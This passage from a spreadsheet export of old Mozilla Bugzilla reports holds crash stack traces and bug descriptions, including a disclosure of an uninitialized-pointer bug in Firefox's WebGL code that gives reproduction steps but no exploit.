	 nsXULElement::SetAttr
[c:/builds/seamonkey/mozilla/content/xul/content/src/nsXULElement.cpp  line 2434]
	 nsXULElement::SetAttr
[c:/builds/seamonkey/mozilla/content/xul/content/src/nsXULElement.cpp  line 2454]
	 nsXBLPrototypeBinding::AttributeChanged
[c:/builds/seamonkey/mozilla/content/xbl/src/nsXBLPrototypeBinding.cpp  line 499]
	 nsXBLBinding::AttributeChanged
[c:/builds/seamonkey/mozilla/content/xbl/src/nsXBLBinding.cpp  line 834]
	 nsXULElement::SetAttr
[c:/builds/seamonkey/mozilla/content/xul/content/src/nsXULElement.cpp  line 2401]
	 nsXULElement::SetAttribute
[c:/builds/seamonkey/mozilla/content/xul/content/src/nsXULElement.cpp  line 1230]
	 XPTC_InvokeByIndex
[c:/builds/seamonkey/mozilla/xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp 
line 102]
	 XPCWrappedNative::CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappednative.cpp  line 2019]
	 XPC_WN_CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappednativejsops.cpp 
line 1270]
	 js_Invoke	[c:/builds/seamonkey/mozilla/js/src/jsinterp.c  line 914]
	 js_Interpret	[c:/builds/seamonkey/mozilla/js/src/jsinterp.c  line 2934]
	 js_Invoke	[c:/builds/seamonkey/mozilla/js/src/jsinterp.c  line 930]
	 js_InternalInvoke	[c:/builds/seamonkey/mozilla/js/src/jsinterp.c  line 1007]
	 js_InternalGetOrSet	[c:/builds/seamonkey/mozilla/js/src/jsinterp.c  line 1050]
	 js_SetProperty	[c:/builds/seamonkey/mozilla/js/src/jsobj.c  line 2760]
	 js_Interpret	[c:/builds/seamonkey/mozilla/js/src/jsinterp.c  line 2127]
	 js_Invoke	[c:/builds/seamonkey/mozilla/js/src/jsinterp.c  line 930]
	 js_InternalInvoke	[c:/builds/seamonkey/mozilla/js/src/jsinterp.c  line 1007]
	 JS_CallFunctionValue	[c:/builds/seamonkey/mozilla/js/src/jsapi.c  line 3573]
	 nsJSContext::CallEventHandler
[c:/builds/seamonkey/mozilla/dom/src/base/nsJSEnvironment.cpp  line 1300]
	 nsJSEventListener::HandleEvent
[c:/builds/seamonkey/mozilla/dom/src/events/nsJSEventListener.cpp  line 182]
	 nsXBLPrototypeHandler::ExecuteHandler
[c:/builds/seamonkey/mozilla/content/xbl/src/nsXBLPrototypeHandler.cpp  line 462]
	 nsXBLEventHandler::HandleEvent
[c:/builds/seamonkey/mozilla/content/xbl/src/nsXBLEventHandler.cpp  line 88]
	 nsEventListenerManager::HandleEventSubType
[c:/builds/seamonkey/mozilla/content/events/src/nsEventListenerManager.cpp  line
1423]
	 nsEventListenerManager::HandleEvent
[c:/builds/seamonkey/mozilla/content/events/src/nsEventListenerManager.cpp  line
1500]
	 nsXULElement::HandleDOMEvent
[c:/builds/seamonkey/mozilla/content/xul/content/src/nsXULElement.cpp  line 3168]
	 PresShell::HandleDOMEventWithTarget
[c:/builds/seamonkey/mozilla/layout/html/base/src/nsPresShell.cpp  line 6265]
	 nsPopupSetFrame::OnCreate
[c:/builds/seamonkey/mozilla/layout/xul/base/src/nsPopupSetFrame.cpp  line 601]
	 nsPopupSetFrame::ShowPopup
[c:/builds/seamonkey/mozilla/layout/xul/base/src/nsPopupSetFrame.cpp  line 346]
	 nsPopupBoxObject::ShowPopup
[c:/builds/seamonkey/mozilla/layout/xul/base/src/nsPopupBoxObject.cpp  line 194]
	 XPTC_InvokeByIndex
[c:/builds/seamonkey/mozilla/xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp 
line 102]
	 XPCWrappedNative::CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappednative.cpp  line 2019]
	 XPC_WN_CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappednativejsops.cpp 
line 1270]
	 js_Invoke	[c:/builds/seamonkey/mozilla/js/src/jsinterp.c  line 914]
	 js_Interpret	[c:/builds/seamonkey/mozilla/js/src/jsinterp.c  line 2934]
	 js_Invoke	[c:/builds/seamonkey/mozilla/js/src/jsinterp.c  line 930]
	 nsXPCWrappedJSClass::CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappedjsclass.cpp  line 1333]
	 nsXPCWrappedJS::CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappedjs.cpp  line 429]
	 PrepareAndDispatch
[c:/builds/seamonkey/mozilla/xpcom/reflect/xptcall/src/md/win32/xptcstubs.cpp 
line 119]
	 SharedStub
[c:/builds/seamonkey/mozilla/xpcom/reflect/xptcall/src/md/win32/xptcstubs.cpp 
line 147]
	 nsGlobalHistory::OnStartLookup
[c:/builds/seamonkey/mozilla/xpfe/components/history/src/nsGlobalHistory.cpp 
line 4096]
	 XPTC_InvokeByIndex
[c:/builds/seamonkey/mozilla/xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp 
line 102]
	 XPCWrappedNative::CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappednative.cpp  line 2019]
	 XPC_WN_CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappednativejsops.cpp 
line 1270]
	 js_Invoke	[c:/builds/seamonkey/mozilla/js/src/jsinterp.c  line 914]
	 js_Interpret	[c:/builds/seamonkey/mozilla/js/src/jsinterp.c  line 2934]
	 js_Invoke	[c:/builds/seamonkey/mozilla/js/src/jsinterp.c  line 930]
	 js_InternalInvoke	[c:/builds/seamonkey/mozilla/js/src/jsinterp.c  line 1007]
	 JS_CallFunctionValue	[c:/builds/seamonkey/mozilla/js/src/jsapi.c  line 3573]
	 nsJSContext::CallEventHandler
[c:/builds/seamonkey/mozilla/dom/src/base/nsJSEnvironment.cpp  line 1300]
	 GlobalWindowImpl::RunTimeout
[c:/builds/seamonkey/mozilla/dom/src/base/nsGlobalWindow.cpp  line 5010]
	 GlobalWindowImpl::TimerCallback
[c:/builds/seamonkey/mozilla/dom/src/base/nsGlobalWindow.cpp  line 5367]
	 nsTimerImpl::Fire	[c:/builds/seamonkey/mozilla/xpcom/threads/nsTimerImpl.cpp 
line 383]
	 nsAppShell::Run	[c:/builds/seamonkey/mozilla/widget/src/windows/nsAppShell.cpp
 line 142]
	 nsAppShellService::Run
[c:/builds/seamonkey/mozilla/xpfe/appshell/src/nsAppShellService.cpp  line 484]
 	Source File : c:/builds/seamonkey/mozilla/content/xbl/src/nsXBLService.cpp
line : 563
     (24776573)	URL: my.yahoo.com
     (24776573)	Comments: typing in another address
 560                          NS_NewURI(getter_AddRefs(uri) spec.get())
 561                          PRBool equal
 562                          if (NS_SUCCEEDED(uri-&gt;Equals(aURL &amp;equal)) &amp;&amp; equal)
 563 hyatt      1.61            return NS_OK
I believe NS_NewURI failed</t>
  </si>
  <si>
    <t>FIREFOX-379738</t>
  </si>
  <si>
    <t>Error entry point GetLongPathNameA could not be located under NT 4.0 starting Firefox 2.0.0.4 RC1</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.4) Gecko/20070501 Firefox/2.0.0.4
Build Identifier: Mozilla/5.0 (Windows U WinNT 4.0 en-US rv:1.8.1.4) Gecko/20070501 Firefox/2.0.0.4
Firefox 2.0.0.3 and previous versions of 2.x installed and run fine under Windows NT 4.0 without any complaints. 
After updating to the 2.0.0.4 RC1 build from http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/2.0.0.4-candidates/rc1/ Firefox no longer starts. 
The error message is The procedure entry point GetLongPathNameA could not be located in the dynamic link library KERNEL32.dll
Tested on two computers with NT 4 Workstation Service Pack 6a.
Reproducible: Always
Steps to Reproduce:
1. Install or update to Firefox 2.0.0.4 RC1 from http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/2.0.0.4-candidates/rc1/
2. Try to run
Actual Results:  
Won't start any more!
Expected Results:  
Should start and run like the previous 2.0.0.x versions.</t>
  </si>
  <si>
    <t>lineback</t>
  </si>
  <si>
    <t>BUGZILLA-297744</t>
  </si>
  <si>
    <t>Update Changes Page for 2.20rc1 and 2.18.2</t>
  </si>
  <si>
    <t>This is pretty simple usually. :-)</t>
  </si>
  <si>
    <t>MINIMO_GRAVEYARD-323154</t>
  </si>
  <si>
    <t>Playing embedded (wav) music doesn't work</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: http://www.meer.net/~dougt/minimo_ce/MinimoCE_0.012.zip
When opening a web-page with an embed tag in it for playing music
() it doesn't play anything or even show a message.
Reproducible: Always
Steps to Reproduce:
1. Create a page with an embed tag (see above)
2. Open the page
Actual Results:  
Nothing happens (blank page)
Expected Results:  
Music playing (once)</t>
  </si>
  <si>
    <t>chris.breederveld</t>
  </si>
  <si>
    <t>CORE-286372</t>
  </si>
  <si>
    <t>Mozilla doesn't deselect text when you single click on certain areas</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b2) Gecko/20050306 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b2) Gecko/20050306 Firefox/1.0+
See testcase select any text and click below the fun text or between (or on)
the two HR's. It also doesn't work when you click on images but that bug report
has already been filed.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>selection</t>
  </si>
  <si>
    <t>pete_a90</t>
  </si>
  <si>
    <t>CORE-525984</t>
  </si>
  <si>
    <t>Copy to uninitialized pointer in nsGLPbufferCGL::ThebesSurface</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10_6_1 en-us) AppleWebKit/531.9 (KHTML like Gecko) Version/4.0.3 Safari/531.9
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.6 en-US rv:1.9.3a1pre) Gecko/20091101 Minefield/3.7a1pre
In content/canvas/src/nsGLPbufferCGL.cpp
gfxASurface*
nsGLPbufferCGL::ThebesSurface()
{
    if (!mThebesSurface) {
        mThebesSurface = new gfxImageSurface(gfxIntSize(mWidth mHeight) gfxASurface::ImageFormatARGB32)
        if (mThebesSurface-&gt;CairoStatus() != 0) {
            fprintf (stderr image surface failed\n)
            return nsnull
        }
        mQuartzSurface = new gfxQuartzImageSurface(mThebesSurface)
        mImageNeedsUpdate = PR_TRUE
    }
    if (mImageNeedsUpdate) {
        MakeContextCurrent()
        mGLWrap.fReadPixels (0 0 mWidth mHeight LOCAL_GL_BGRA LOCAL_GL_UNSIGNED_INT_8_8_8_8_REV mThebesSurface-&gt;Data())
If this line
mThebesSurface = new gfxImageSurface(gfxIntSize(mWidth mHeight) gfxASurface::ImageFormatARGB32)
fails due to gfxASurface::CheckSurfaceSize the function will return with mThebesSurface set to some pointer value but the object not fully initialized.  The next time the function runs 
the line
mGLWrap.fReadPixels (0 0 mWidth mHeight LOCAL_GL_BGRA LOCAL_GL_UNSIGNED_INT_8_8_8_8_REV mThebesSurface-&gt;Data())
results in a copy to an uninitialized pointer leading to memory corruption and potential code execution.
Reproducible: Always
Steps to Reproduce:
Use recent Firefox 3.7 (this doesn't affect 3.5).
Set the MallocScribble environment variable to 1 on Mac OS X and open Minefield
Something like
killall firefox-bin
env MallocScribble=1 open -a Minefield
Set webgl.enabled_for_all_sites = true in about:config
2. Open attached html file
Actual Results:  
It crashes writing to 0xaaaaaaaa indicating it is writing to an uninitialized pointer.
If it's running 64-bit MineFieldDebug the crashlog will look like
Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: 0x000000000000000d 0x0000000000000000
with the 0xd exception code indicating that it was accessing an address which is invalid in the 64-bit ABI (0xaaaaaaaaaaaaaaaa).
Expected Results:  
No crash.</t>
  </si>
  <si>
    <t>CORE-452119</t>
  </si>
  <si>
    <t>reftest failures when color management is turned on</t>
  </si>
  <si>
    <t>there turned out to be a bunch of different reftest failures when color management is turned on. This is a tracking bug for various issues.</t>
  </si>
  <si>
    <t>bholley</t>
  </si>
  <si>
    <t>CORE-267269</t>
  </si>
  <si>
    <t>run() method of nsIProcess stopped accepting arguments for the new process</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.3) Gecko/20041026 Firefox/1.0RC1
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.3) Gecko/20041026 Firefox/1.0RC1
this used to work for Firefox 0.10 but does not work for Firefox 1.0RC1.
The cause is from the following checkin
mozilla/xpcom/threads/nsProcessCommon.cpp
1.11 jst%mozilla.jstenback.com Fixing bug 263429. Making nsProcessCommon::Run()
work on Mac OS X. 
http://lxr.mozilla.org/aviarybranch/source/xpcom/threads/nsProcessCommon.cpp#201
201 #if defined(XP_MACOSX)
202     // You can't pass arguments to mac apps tell the caller that it
203     // just aint going to work.
204     if (count) {
205         return NS_ERROR_INVALID_ARG
206     }
207 #else
This is a regression but a minor loss of a function that is not used (I
suppose) in the official releases. setting severity to minor.
Reproducible: Always
Steps to Reproduce:
1. install Venkman and Nvu.app. (do not start Nvu.app yet)
2. from the Venkman interactive session run
 var appf =
Components.classes['@mozilla.org/file/local1'].createInstance(Components.interfaces.nsILocalFile)
appf.initWithPath(/Applications/Nvu0.50.app/Contents/MacOS/nvu-bin)
var proce =
Components.classes['@mozilla.org/process/util1'].createInstance(Components.interfaces.nsIProcess)
proce.init(appf)
proce.run(false [] 0)
3. You see that Nvu.app starts up.
4. quit Nvu.app.
5. Again from the Venkman interactive session run
proce.run(false [-edit file:///Users/myusername/an_existing_file.html] 2)
Actual Results:  
In Firefox 1.0RC1 you get
[Exception... Component returned failure code: 0x80070057
(NS_ERROR_ILLEGAL_VALUE) [nsIProcess.run] nsresult: 0x80070057
(NS_ERROR_ILLEGAL_VALUE) location: JS frame ::
chrome://venkman/content/venkman-eval.js :: con_eval :: line 46 data: no]
Expected Results:  
Nvu.app should be started up with the an_existing_file.html page as it used to
do for Firefox 0.10</t>
  </si>
  <si>
    <t>neomjp</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-505522</t>
  </si>
  <si>
    <t>Support building with C++ exceptions</t>
  </si>
  <si>
    <t>Created attachment 389735
v1
This will help me and shouldn't hurt anyone else.  My immediate use case is JSAPI tests.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-344570</t>
  </si>
  <si>
    <t>Make contextual menus look more native</t>
  </si>
  <si>
    <t>I'm rolling up a few fixes to improve the appearance and behavior of contextual menus on the Mac.  Some of the changes also apply to drop-down menus and some of the changes apply to all pop-up windows.  All of these changes make certain XUL interface elements look much more like their native counterparts.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-473210</t>
  </si>
  <si>
    <t>remove l10n-win32-tbox l10n-linux-tbox from nagios</t>
  </si>
  <si>
    <t>... as they have now been powered off and will soon be deleted.</t>
  </si>
  <si>
    <t>CORE-342750</t>
  </si>
  <si>
    <t>NativeUConvService::GetNativeConverter leaks on failure</t>
  </si>
  <si>
    <t>this actually happens :)</t>
  </si>
  <si>
    <t>sciguyryan</t>
  </si>
  <si>
    <t>MOZILLA.ORG-462797</t>
  </si>
  <si>
    <t xml:space="preserve">CVS Account Request - Markus Stange </t>
  </si>
  <si>
    <t>Despot won't let me add people to a peer list unless they have cvs commit access. Markus Stange has hg commit privs (bug 455025) but not cvs commit privs.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-264439</t>
  </si>
  <si>
    <t>unable to display themes/extensions for all platforms</t>
  </si>
  <si>
    <t>I'm unable to display themes/extensions for all platforms at u.m.o. this occurs
on all platforms but this issue is particularly bad when using a Mac (eg
testing with firefox 2004101406-0.9+ on OS X 10.3.5).
0. on http://update.mozilla.org/ the page notes that there are 48 Firefox themes.
1. go http://update.mozilla.org/themes/showlist.php?category=All (clicking the
All link on the left side of many u.m.o. pages will take you there).
note that (when using a Mac) there are only 3 themes provided labeled
specifically to work with Macs.
2. change the OS: dropmenu near the top of the page to ALL and click the
Update button.
expected: should get a listing of all themes which are applicable to All OSes.
actual results: the dropmenu resets to MacOSX and only the 3 themes are
displayed. similar results also occur for extensions. and also similar results
when using Linux (resulting in the OS being reset to Linux etc.).
I can work my way around this issue by going to
http://update.mozilla.org/themes/ and clicking on a given theme's link --but
this is only useful for themes which happen to be listed on that page. this
still doesn't allow me to (easily) see all themes which are all OS compatible.</t>
  </si>
  <si>
    <t>FIREFOX-305127</t>
  </si>
  <si>
    <t>Label for the multiselect not read by the screen reader</t>
  </si>
  <si>
    <t>Label for the multiselect list box in Customize Character encoding dialog not
read by the screen reader. Inspect objects shows no label in the name property. 
Steps to recreate:
1.	Alt + v for View menu
2.	Press c for character encoding
3.	Press c for customize dialog
4.	Label for Multi-Select List box is not spoken when the dialog is opened. (If
you tab away and back the label is spoken)
5.	Expected result: Label should be spoken when dialog is opened.</t>
  </si>
  <si>
    <t>mdfft</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-196053</t>
  </si>
  <si>
    <t>medinstitute.org - Blockquoted items overlapping</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.2.1) Gecko/20021130
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.2.1) Gecko/20021130
After going to above link select Medical Institute Advisory.  Scroll down the
list of items.  On my machine everything below the May 282002 item and above
Sept 10 2001 are overlapping.  I tried reloading with no change.  Works fine
under IE.
Reproducible: Always
Steps to Reproduce:
1. http://www.medinstitute.org/medical/index.htm    
2. select Medical Institute Advisory.
3. scroll down.
Actual Results:  
A range of entries from May 28 2002 to Sept 10 2001 overlap.
Expected Results:  
Not overlapped any text or items ...</t>
  </si>
  <si>
    <t>abuse_this</t>
  </si>
  <si>
    <t>MAILNEWS_CORE_GRAVEYARD-214407</t>
  </si>
  <si>
    <t>Palm Sync</t>
  </si>
  <si>
    <t>MAILNEWS_CORE_GRAVEYARD</t>
  </si>
  <si>
    <t>Turn mozilla palm synch component into an extension</t>
  </si>
  <si>
    <t>The seamonkey suite has an optional component for address book palm synch. This
should be re-bundled into a Thunderbird extension for our palm users. 
In order for this to happen we need somone that has the palm synch SDK to build
mozilla with palm synch turned on to build the extension.</t>
  </si>
  <si>
    <t>SEAMONKEY-215503</t>
  </si>
  <si>
    <t>Thread appears to disappear</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.5a) Gecko/20030718
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.5a) Gecko/20030718
I have view threads with unread set.
I press 'N' to goto next message.
I press 'Delete' to delete that message.
The thread disappears from the mail list but the body next message in the thread
is shown. Pressing 'N' will go to the next message in the thread it's just the
thread is not shown in the list of messages
Problem did not occur in Mozilla 1.4
Reproducible: Always
Steps to Reproduce:
1. I have view threads with unread set.
2. I press 'N' to goto next message.
3. I press 'Delete' to delete that message.
Actual Results:  
The thread disappears from the mail list but the body next message in the thread
is shown. Pressing 'N' will go to the next new message in the thread it's just
the thread is not shown in the list of messages.
Expected Results:  
The thread list should remain visible.
Problem did not occur in Mozilla 1.4</t>
  </si>
  <si>
    <t>dave.kimberley</t>
  </si>
  <si>
    <t>FIREFOX-332256</t>
  </si>
  <si>
    <t>Middle clicking items in toolbar chevron overflow menu doesnt close menu</t>
  </si>
  <si>
    <t>If you middle click an item in the bookmarks toolbar overflow menu the menu isn't closed like it is with other menus on the toolbar and in the bookmark menu.
This should be made consistent across the board. Personally I think not closing on middle click is a good thing and bug 260611 and bug 195031 have some suggestions to that end.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-448046</t>
  </si>
  <si>
    <t>talos try shouldn't merge scheduler requests</t>
  </si>
  <si>
    <t>Created attachment 331368
[Checked in]disallow queue merging on talos try scheduler
Merging causes talos try to skip testing of some browsers when the queue becomes too long.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-505221</t>
  </si>
  <si>
    <t>crash [@ CountTotalMimeAttachments(MimeContainer*) ]</t>
  </si>
  <si>
    <t>0  	thunderbird.exe  	CountTotalMimeAttachments  	mailnews/mime/src/mimemoz2.cpp:216
1 	thunderbird.exe 	CountTotalMimeAttachments 	mailnews/mime/src/mimemoz2.cpp:223
2 	thunderbird.exe 	CountTotalMimeAttachments 	mailnews/mime/src/mimemoz2.cpp:223
3 	thunderbird.exe 	MimeGetAttachmentList 	mailnews/mime/src/mimemoz2.cpp:568
4 	thunderbird.exe 	mime_display_stream_complete 	mailnews/mime/src/mimemoz2.cpp:975
5 	thunderbird.exe 	nsStreamConverter::OnStopRequest 	mailnews/mime/src/nsStreamConverter.cpp:1068
6 	thunderbird.exe 	nsMsgProtocol::OnStopRequest 	mailnews/base/util/nsMsgProtocol.cpp:393
7 	thunderbird.exe 	nsMailboxProtocol::OnStopRequest 	mailnews/local/src/nsMailboxProtocol.cpp:380
8 	thunderbird.exe 	nsInputStreamPump::OnStateStop 	netwerk/base/src/nsInputStreamPump.cpp:576
9 	thunderbird.exe 	nsInputStreamPump::OnInputStreamReady 	netwerk/base/src/nsInputStreamPump.cpp:401
10 	xpcom_core.dll 	nsInputStreamReadyEvent::Run 	xpcom/io/nsStreamUtils.cpp:111
11 	xpcom_core.dll 	nsThread::ProcessNextEvent 	xpcom/threads/nsThread.cpp:510
12 	xpcom_core.dll 	NS_ProcessNextEvent_P 	objdir-tb/mozilla/xpcom/build/nsThreadUtils.cpp:227
13 	xpcom_core.dll 	nsThread::Shutdown 	xpcom/threads/nsThread.cpp:465
14 	thunderbird.exe 	mozStorageConnection::Close 	storage/src/mozStorageConnection.cpp:244
15 	xpcom_core.dll 	NS_InvokeByIndex_P 	xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp:101
16 	thunderbird.exe 	XPCWrappedNative::CallMethod 	js/src/xpconnect/src/xpcwrappednative.cpp:2454
17 	thunderbird.exe 	XPC_WN_CallMethod 	js/src/xpconnect/src/xpcwrappednativejsops.cpp:1590</t>
  </si>
  <si>
    <t>CALENDAR-324676</t>
  </si>
  <si>
    <t>day/week view don't refresh correctly when start/end time changed via preferences (no events displayed)</t>
  </si>
  <si>
    <t>Once the fix for bug 321769 lands editing the default start or end hour via the preference dialog in Lightning will dynamically reset that value on the view.  The view will then refresh itself according to the value but the refreshed version has no events.  The user needs to manually do something that forces another refresh to see the events again.</t>
  </si>
  <si>
    <t>CORE-529709</t>
  </si>
  <si>
    <t>lirasm: 'not' is a unary operator</t>
  </si>
  <si>
    <t>Created attachment 413241
patch
In assembleFragment() LIR_not is grouped with the binary operators.  It should be with the unary operators.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-32012</t>
  </si>
  <si>
    <t>illegal usage of nsString in nsMsgDatabase::YarnTonsString</t>
  </si>
  <si>
    <t>When I turn on the nsString illegal usage detection code (see 28424) and open my
mailbox (IMAP4) I hit the following problme. the nsMsgDatabase::YarnTonsString
passing char* to nsString in a illegal way. The nsString can only handle ASCII
value in char* but not other data from 0x80-0xFF without proper conversion.
Here is the stack trace
NTDLL! 77f662ac()
nsDebug::Assertion(const char * 0x100a7160 const char * 0x100a7150 const char
* 0x100a7128 int 0x0000010e) line 189 + 13 bytes
CopyChars1To2(char * 0x00129c58 int 0x00000000 const char * 0x0661680c
unsigned int 0x00000000 unsigned int 0x0000003c) line 270 + 31 bytes
nsStr::Append(nsStr &amp; {...} const nsStr &amp; {...} unsigned int 0x00000000 int
0x0000003c) line 171 + 50 bytes
nsString::Append(const char * 0x0661680c int 0x0000003c) line 1072 + 43 bytes
nsString::Assign(const char * 0x0661680c int 0x0000003c) line 944
nsMsgDatabase::YarnTonsString(mdbYarn * 0x00129acc nsString * 0x00129c40) line 2573
nsMsgDatabase::RowCellColumnTonsString(nsIMdbRow * 0x066152f8 unsigned long
0x00000081 nsString &amp; {...}) line 2345 + 13 bytes
nsMsgDatabase::RowCellColumnToMime2DecodedString(nsIMdbRow * 0x066152f8
unsigned long 0x00000081 nsString &amp; {...}) line 2375 + 26 bytes
nsMsgHdr::GetMime2DecodedSubject(nsMsgHdr * const 0x06616b10 nsString *
0x00129dc0) line 595
nsMessage::GetMime2DecodedSubject(nsMessage * const 0x076146c4 nsString *
0x00129dc0) line 273 + 33 bytes
nsMsgMessageDataSource::createMessageNameNode(nsIMessage * 0x076146c4 int
0x00000000 nsIRDFNode * * 0x00129f0c) line 912 + 22 bytes
nsMsgMessageDataSource::createMessageNode(nsIMessage * 0x076146c4
nsIRDFResource * 0x03680080 nsIRDFNode * * 0x00129f0c) line 868 + 18 bytes
nsMsgMessageDataSource::GetTarget(nsMsgMessageDataSource * const 0x03680100
nsIRDFResource * 0x076146b0 nsIRDFResource * 0x03680080 int 0x00000001
nsIRDFNode * * 0x00129f0c) line 291 + 25 bytes
CompositeDataSourceImpl::GetTarget(CompositeDataSourceImpl * const 0x0353e490
nsIRDFResource * 0x076146b0 nsIRDFResource * 0x03680080 int 0x00000001
nsIRDFNode * * 0x00129f0c) line 708 + 28 bytes
RDFGenericBuilderImpl::SubstituteText(nsIRDFResource * 0x076146b0 nsString &amp;
{...}) line 1686 + 65 bytes
RDFGenericBuilderImpl::BuildContentFromTemplate(nsIContent * 0x034ec1e0
nsIContent * 0x076cd740 nsIContent * 0x076cd740 int 0x00000000 nsIRDFResource
* 0x076146b0 int 0x00000000 nsIContent * * 0x00000000 int * 0x00000000) line
2065 + 22 bytes
RDFGenericBuilderImpl::CreateTemplateContents(nsIContent * 0x076cd740 const
nsString &amp; {...} nsIContent * * 0x00000000 int * 0x00000000) line 2638 + 46 bytes
RDFGenericBuilderImpl::CreateTemplateAndContainerContents(nsIContent *
0x076cd740 nsIContent * * 0x00000000 int * 0x00000000) line 2448 + 30 bytes
RDFGenericBuilderImpl::CreateContents(RDFGenericBuilderImpl * const 0x0353e4f0
nsIContent * 0x076cd740) line 738 + 16 bytes
nsXULDocument::CreateContents(nsXULDocument * const 0x0327f7d4 nsIContent *
0x076cd740) line 2039 + 16 bytes
nsXULElement::EnsureContentsGenerated() line 3480 + 27 bytes
nsXULElement::ChildCount(const nsXULElement * const 0x076cd740 int &amp;
0x03237690) line 2228 + 8 bytes
nsCSSFrameConstructor::TableProcessChildren(nsIPresShell * 0x03237400
nsIPresContext * 0x03233750 nsFrameConstructorState &amp; {...} nsIContent *
0x076cd740 nsIFrame * 0x05b8e75c nsFrameItems &amp; {...} nsTableCreator &amp; {...})
line 1926
nsCSSFrameConstructor::ConstructTableRowFrameOnly(nsIPresShell * 0x03237400
nsIPresContext * 0x03233750 nsFrameConstructorState &amp; {...} nsIContent *
0x076cd740 nsIFrame * 0x05b8e6c8 nsIStyleContext * 0x07bcaaf0 int 0x00000001
nsIFrame * &amp; 0x05b8e75c nsTableCreator &amp; {...}) line 1674 + 38 bytes
nsCSSFrameConstructor::ConstructTableRowFrame(nsIPresShell * 0x03237400
nsIPresContext * 0x03233750 nsFrameConstructorState &amp; {...} nsIContent *
0x076cd740 nsIFrame * 0x05b8e6c8 nsIStyleContext * 0x07bcaaf0 nsIFrame * &amp;
0x00000000 nsIFrame * &amp; 0x05b8e75c nsTableCreator &amp; {...} nsTableList *
0x00000000) line 1612 + 49 bytes
nsCSSFrameConstructor::ConstructXULFrame(nsIPresShell * 0x03237400
nsIPresContext * 0x03233750 nsFrameConstructorState &amp; {...} nsIContent *
0x076cd740 nsIFrame * 0x05b8e6c8 nsIAtom * 0x013f8350 nsIStyleContext *
0x07bcaaf0 nsFrameItems &amp; {...} int 0x00000000 int &amp; 0x00000000) line 4515 +
49 bytes
nsCSSFrameConstructor::ConstructFrame(nsIPresShell * 0x03237400 nsIPresContext
* 0x03233750 nsFrameConstructorState &amp; {...} nsIContent * 0x076cd740 nsIFrame
* 0x05b8e6c8 nsFrameItems &amp; {...}) line 5804 + 56 bytes
nsCSSFrameConstructor::CreateTreeWidgetContent(nsCSSFrameConstructor * const
0x03237690 nsIPresContext * 0x03233750 nsIFrame * 0x05b8e6c8 nsIFrame *
0x00000000 nsIContent * 0x076cd740 nsIFrame * * 0x05b8e714 int 0x00000001
int 0x00000000 nsILayoutHistoryState * 0x00000000) line 10172 + 37 bytes
nsTreeRowGroupFrame::GetFirstFrameForReflow(nsIPresContext * 0x03233750) line 1215
nsTableRowGroupFrame::ReflowMappedChildren(nsTableRowGroupFrame * const
0x05b8e6c8 nsIPresContext * 0x03233750 nsHTMLReflowMetrics &amp; {...}
RowGroupReflowState &amp; {...} unsigned int &amp; 0x00000000 nsTableRowFrame *
0x00000000 nsReflowReason eReflowReason_Resize int 0x00000001 int 0x00000000)
line 372 + 18 bytes
nsTableRowGroupFrame::Reflow(nsTableRowGroupFrame * const 0x05b8e6c8
nsIPresContext * 0x03233750 nsHTMLReflowMetrics &amp; {...} const
nsHTMLReflowState &amp; {...} unsigned int &amp; 0x00000000) line 1088 + 38 bytes
nsContainerFrame::ReflowChild(nsIFrame * 0x05b8e6c8 nsIPresContext *
0x03233750 nsHTMLReflowMetrics &amp; {...} const nsHTMLReflowState &amp; {...} int
0x00000000 int 0x00000000 unsigned int 0x00000000 unsigned int &amp; 0x00000000)
line 646 + 31 bytes
nsTableRowGroupFrame::ReflowMappedChildren(nsTableRowGroupFrame * const
0x0266d150 nsIPresContext * 0x03233750 nsHTMLReflowMetrics &amp; {...}
RowGroupReflowState &amp; {...} unsigned int &amp; 0x00000000 nsTableRowFrame *
0x00000000 nsReflowReason eReflowReason_Resize int 0x00000001 int 0x00000000)
